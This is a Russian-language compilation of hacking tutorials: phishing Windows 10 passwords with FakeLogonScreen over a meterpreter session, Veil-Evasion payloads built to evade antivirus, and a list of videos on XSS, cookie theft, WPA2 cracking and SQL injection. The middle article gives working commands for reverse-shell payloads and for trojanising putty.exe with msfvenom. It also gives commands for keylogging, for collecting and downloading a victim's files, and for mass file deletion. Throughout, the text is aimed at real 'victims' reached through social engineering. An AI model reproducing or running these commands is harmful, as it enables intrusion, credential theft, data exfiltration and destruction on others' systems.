- Как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux
- Шаги для взлома пароля Windows 10
- Загрузите FakeLogonScreen в Kali Linux
- Создание вредоносной полезной нагрузки для взлома Windows
- Загрузите полезную нагрузку на целевой машине
- Запустите Metasploit для использования
- Загрузить исполняемый файл
- Некоторая полезная информация
- Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit
- Лучший хакерский курс с Kali Linux на русском языке
- Установка и обновление Kali Linux
- Удаленный взлом компьютера через интернет (часть 1)
- Удаленный взлом компьютера через интернет (часть 2)
- Что такое cookies в браузере
- Взлом Wi-Fi пароля WPA2
- Еще одно видео по взлому Wi-Fi
- Взлом WEB-сайтов: SQL-инъекции (часть 1)
- Взлом WEB-сайтов: SQL-инъекции (часть 2)
- Взлом пароля пользователя
Как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux
В этой статье демонстрируется подробное руководство о том, как взломать пароли Windows 10 с помощью FakeLogonScreen. Я буду использовать FakeLogonScreen…
В этой статье демонстрируется подробное руководство о том, как взломать пароли Windows 10 с помощью FakeLogonScreen.
Я буду использовать FakeLogonScreen и Kali Linux для взлома паролей Windows 10. FakelogonScreen – это удобный и скрытый инструмент, который создает поддельный журнал на экране на целевой машине под управлением Windows 10. Этот инструмент заставляет целевого пользователя вводить правильные учетные данные и, после его получения, передает его злоумышленнику.
Arris Huijgen разработал этот полезный инструмент, он использует преимущества обычного поведения среды Windows, отображает экран входа в систему, когда он выходит из спящего режима, и запрашивает ввод учетных данных. В то время этот инструмент искал фишинговые учетные данные Windows от цели, и сила этого инструмента появилась, когда он принимает только действительные учетные данные.
Шаги для взлома пароля Windows 10
Теперь давайте попробуем этот инструмент и выполним эксплойт. Нам нужно развернуть две виртуальные машины, то есть Kali Linux и Windows 10. В моей виртуальной лабораторной среде Kali (атакующая машина) имеет IP: 192.168.0.103, а Windows (целевая машина) получила 192.168.0.100.
Загрузите FakeLogonScreen в Kali Linux
Для начала нам нужно скачать исполняемый файл FakeLogonScreen на нашей атакующей машине по ссылке:
Теперь предположим, что целевой компьютер подключен к той же сети, что и атакующий компьютер.
Создание вредоносной полезной нагрузки для взлома Windows
Мы создадим вредоносную полезную нагрузку с помощью инструмента msfvenom в соответствии с информацией, полученной целевой системой. Мы установим lhost на IP нашего Kali, то есть 192.168.0.103, и установим lport равным 4444. Поскольку мы заинтересованы в использовании системы Windows, мы сгенерируем полезную нагрузку в виде исполняемого файла, чтобы легко выполнить ее на целевой машине. Используйте команду:
Здесь ‘payload.exe’ – это имя сгенерированной полезной нагрузки. После этого мы запустим Python One-liner для создания HTTP-сервера, который будет размещать эту вредоносную полезную нагрузку на порту 80 целевой машины.
Загрузите полезную нагрузку на целевой машине
Все готово сейчас, самый важный этап наступил, когда мы должны получить цель для загрузки этой вредоносной полезной нагрузки. В реальных сценариях злоумышленник может использовать различные методы социальной инженерии и позволить целевому пользователю загрузить этот вредоносный файл в свою систему.
Для практической демонстрации мы получим доступ к каталогу нашего компьютера Kali с компьютера с Windows и загрузим полезную нагрузку.
Это также будет показывать текущие журналы в нашей машине Kali.
Запустите Metasploit для использования
Вернемся прямо к Kali и запустим Metasploit-framework.
Используйте модуль multi/handler .
Установите полезную нагрузку windows/meterpreter/reverse_tcp .
Установите lhost как наш IP т.е. 192.168.0.103 и lport как 4444
После настройки всего этого, просто запустите эксплойт, вернитесь на компьютер с Windows и запустите исполняемый файл, то есть «payload.exe». Это быстро даст нам сеанс метролога.
Загрузить исполняемый файл
Теперь загрузите исполняемый файл FakeLogonScreen, который мы загрузили ранее. Убедитесь, что вы указали правильный путь к исполняемому файлу.
После этого получите доступ к оболочке и запустите FakeLogonScreen.exe, как показано ниже:
И БУМ! На целевом компьютере все запущенные окна будут закрыты, и появится экран входа в систему, запрашивающий учетные данные, и он отобразится в качестве допустимого окна. Пользователь не колебался ни секунды, чтобы ввести свои учетные данные и вернуть свою работу.
Чтобы проверить надежность этого инструмента, мы будем вводить неправильный пароль.
И это покажет ошибку «Пароль неверный, попробуйте еще раз». Это сила инструмента FakeLogonScreen, который заставляет цель вводить свой правильный пароль. У пользователя нет другого выбора, кроме как ввести свой пароль.
Давайте введем правильный пароль, и вы получите стандартное окно, так как ничего не произошло раньше.
Это также показывает, что FakeLogonScreen работает аналогично кейлоггеру. Злоумышленник может легко отслеживать все журналы и может получить правильный пароль целевого пользователя.
Некоторая полезная информация
Этот инструмент также может эффективно работать на нескольких настольных системах. При запуске его на разных рабочих столах все затронутые экраны становятся черными сразу после выполнения эксплойта с атакующей машины. Это работает, даже если целевой пользователь установил настроенный фон.
Zip-файл эксплойта также содержит другой исполняемый файл с именем «FakeLogonScreenToFile.exe», который работает так же, как и предыдущий исполняемый файл. Тем не менее, он имеет некоторые дополнительные функции, т.е. не только показывает пароль, но и сохраняет его в файле %LOCALAPPDATA%\Microsoft\user.db .
Этот инструмент также может быть интегрирован с Cobalt Strike для эффективной работы.
Источник
Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit
В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.
UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/
Ниже представлена схема, по которой будет осуществляться проникновение.
Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)
2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.
Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Следим за установкой, соглашаемся и все устанавливаем.
Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.
Далее вводим команду list – она покажет список доступных payload.
Нас интересует номер 32 – python/meterpreter/reverse_https
Задаем опции будущему файлу, вводим последовательно следующие команды:
set LHOST 83.199.12.XXX (Ваш публичный IP)
set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).
set USE_PYHERION Y (используем энкриптор)
generate (создаем .exe файл)
Вводим имя создаваемого файла.
Выбираем вторую строку, жмем 2.
Ждем успешной генерации файла.
Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.
Выходим из Veil-Evasion.
Запускаем Metasploit.
#msfconsole
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.
Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.
Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.
migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.
1. Кейлоггер
meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer.
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording
meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2.
2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:
run file_collector -r -d e:\\ -f * -o /root/ file.txt
Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst
Скачиваем файлы на свой компьютер.
run file_collector -i /root /file.lst -l /root/
Полагаю не нужно обьяснять, что делают скрипты upload и download)
3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.
4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell
Удаление файлов exe:
del e:\*.* /f /s /q
удаление файлов doc:
del e:\*.doc /f /s /q
удаление файлов pdf:
del e:\*.pdf /f /s /q
5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.
msfvenom -a x86 —platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b «\x00» -f exe -o puttyX.exe
Краткое пояснение аргументов команды:
— a 86 — архитектура процессора.
—platform windows — тут понятно.
— x — указать пользовательский исполняемый файл для использования в качестве шаблона.
— k — сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
— p — тип полезной нагрузки.
— e — тип енкодера.
— b — помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
— f — формат выходного файла.
За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.
Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
Источник
Лучший хакерский курс с Kali Linux на русском языке
Если нужно получить доступ к серверу, поправить работоспособность чужой сети или побаловаться с чьим-то сайтом – Kali Linux вам в помощь.
В этой статье будем рассматривать отличный видеокурс по взлому сайтов, SQL-инъекциям и прочим интересным штукам, которые наиболее удобно реализовать с Kali Linux.
Установка и обновление Kali Linux
В первой части курса рассматривается установка дистрибутива Kali Linux на виртуальную машину VMWare со всеми встроенными инструментами. Для тренировок будет использоваться виртуальная машина OWASP Broken Web Application, в которой находятся сайты с уязвимостями: их-то мы и будем мучить. Также обновим операционную систему.
Рекомендуем к просмотру видео по установке Kali Linux с флешки:
Ну и конечно же установим Kali Linux на эту самую флешку, сохранив при этом все пользовательские данные:
Удаленный взлом компьютера через интернет (часть 1)
Небольшое ознакомительное видео о том, что такое XSS:
В следующем ролике автор рассказывает про XSS-уязвимость сайта, через которую будет взламываться удаленный компьютер. XSS – очень старая, но до сих пор работающая технология взлома. Если у вас есть свой сайт, проверьте, не выполняет ли он пользовательские скрипты, если их ввести, например, в поле комментария? Через эту брешь при помощи инструмента Beef было взломано множество ресурсов…
А данный видеоурок позволит рассмотреть работу XSS-атаки изнутри:
Удаленный взлом компьютера через интернет (часть 2)
Это вторая часть обучающего материала про межсайтовый скриптинг. В ролике автор показывает, как исполнить скриптовую Reflected-атаку на пользователя через сайт с брешью в безопасности. С помощью инструмента Burp Suite получаем хеш ссылки, по которой открывается скрипт и подсаживаем наш ужасный hook ничего не подозревающему пользователю. Когда пользователь откроет целевую страницу, его компьютер окажется в наших руках.
Еще один полезный туториал по взлому с использованием Burp Suite, но без необходимости использовать платный инструментарий:
Что такое cookies в браузере
Автор рассматривает базовые понятия о cookies и средства безопасности в самом браузере для защиты “печенек” от злоумышленника. Будем воровать cookies из браузера Chrome того пользователя, которого взломали на прошлом уроке. Используется по-прежнему многофункциональный инструмент Beef и JS-скрипты, чтобы представиться сайту под именем нашего тестового пользователя.
Другой способ украсть «куки» с использованием Kali Linux:
Взлом Wi-Fi пароля WPA2
В этом ролике автор будет показывать, как с помощью встроенного в Kali Linux инструмента Aircrack-ng можно получить доступ к защищенному роутеру. Будет рассмотрено, как создать флешку с Live CD с Linux-ом для тех случаев, когда на вашем компьютере нет беспроводного адаптера или он не поддерживается Aircrack-ng. Взлому будет подвергаться роутер на котором включен MAC-фильтр, шифрование WPA2 + имя сети будет скрыто.
Еще одно видео по взлому Wi-Fi
Мы также подобрали видео, которое не обрывается. Автор максимально доступно объясняет возможные уязвимости и способы их использования. Вы узнаете, почему Wi-Fi сеть никак не может быть на 100% защищенной.
Взлом WEB-сайтов: SQL-инъекции (часть 1)
В первой части этого урока будем разбираться, как “подсунуть” целевому серверу логин и пароль для входа, если мы этого не знаем. Данный распространенный вид атаки подразумевает под собой обман SQL-базы через подстановку передаваемых параметров. Для этого могут понадобиться дополнительные знания ответов web-сервера и понимание базовых вещей в MySQL.
Взлом WEB-сайтов: SQL-инъекции (часть 2)
Продолжаем изучать процесс взлома сайта через логин и пароль. В этом уроке используется локальное прокси браузера и встроенный инструмент Burp Suite для перехвата отправляемых параметров из web-сервера в базу данных. Для понимания урока и облегчения применения знаний на практике хорошо бы знать тонкости работы запросов GET/POST, а также углубленное понимание SQL-синтаксиса.
Второе видео по SQL-инъекциям хоть и короткое, но очень информативное:
Также можно обратиться к развернутой лекции:
Взлом пароля пользователя
В этом ролике будем получать пароли пользователей Windows. Из-за того, что пароли хранятся в виде одностороннего шифрования, понадобится специальный инструмент, чтобы расшифровать строку и получить искомое. Использоваться будет программка Cain and Abel. Эту манипуляцию нельзя назвать взломом, а скорее расшифровкой, но несмотря на это – информация полезная.
Также предлагаем ознакомиться с другими нашими статьями, которые посвящены взлому паролей:
Источник